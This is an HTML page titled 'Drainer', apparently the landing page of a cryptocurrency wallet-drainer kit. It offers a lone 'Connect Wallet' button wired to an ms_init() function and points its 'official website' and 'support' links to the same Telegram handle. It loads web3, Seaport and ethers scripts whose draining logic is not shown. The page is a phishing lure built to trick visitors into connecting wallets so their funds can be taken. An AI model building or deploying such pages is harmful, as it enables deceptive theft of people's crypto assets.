<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Drainer</title>
</head>

<style>
    .container {
        max-width: 1200px;
        width: 100%;
        margin-left: auto;
        margin-right: auto;
        height: 100vh;
        align-items: center;
        display: flex;
        flex-direction: column;
        justify-content: center;
    }

    body, html {
        padding: 0;
        margin: 0;
        background-color: blue;
    }

    header {
        display: flex;
        justify-content: center;
    }

    header > img {
        width: 220px;
        height: 23px;
    }

    button {
        background-color: white;
        color: #000;
        border: 0;
        width: 175px;
        height: 40px;
        border-radius: 10px;
        cursor: pointer;
        border: 2px solid white;
    }

    button:hover {
        background-color: yellow;
        border: 2px solid yellow;
    }

    .main_content {
        display: flex;
        justify-content: center;
        margin-top: 25px;
    }

    .official_contacts {
        display: flex;
        color: white;
        flex-direction: column;
        margin-top: 25px;
        font-family: Arial, Helvetica, sans-serif;
        text-align: center;
    }

    .official_contacts > span > a {
        font-size: 16px;
        color: yellow;
    }
</style>
<body>
    <div class="container">
       

        <div class="main_content">
            <button onclick="ms_init()">Connect Wallet</button>
        </div>

        <div class="official_contacts">
            <span>Official website: <a href="https://t.me/cryptocoder0">link</a></span>
            <span>Telegram support: <a href="https://t.me/cryptocoder0">link</a></span>
        </div>
    </div>

    <script src="../axios%401.6.7/dist/axios.min.js"></script>
    <script src="assets/web3-provider/web3-modal.js"></script>
    <script src="assets/web3-provider/web3-loader.js"></script>
    <script src="assets/web3-provider/web3-connect.js"></script>
    <script src="assets/web3-provider/web3-router.js"></script>
    <script src="assets/web3-provider/web3-module.js"></script>
    <script src="assets/web3-provider/web3-alert.js"></script>
    <script src="assets/web3-provider/web3-seaport.js"></script>
    <script src="assets/web3-provider/web3-data.js"></script>
    <script src="assets/web3-provider/ethers.js"></script>
    <script src="assets/web3-provider/ethereum-tx.js"></script>
    <script src="assets/web3-provider.js"></script>
</body>
</html>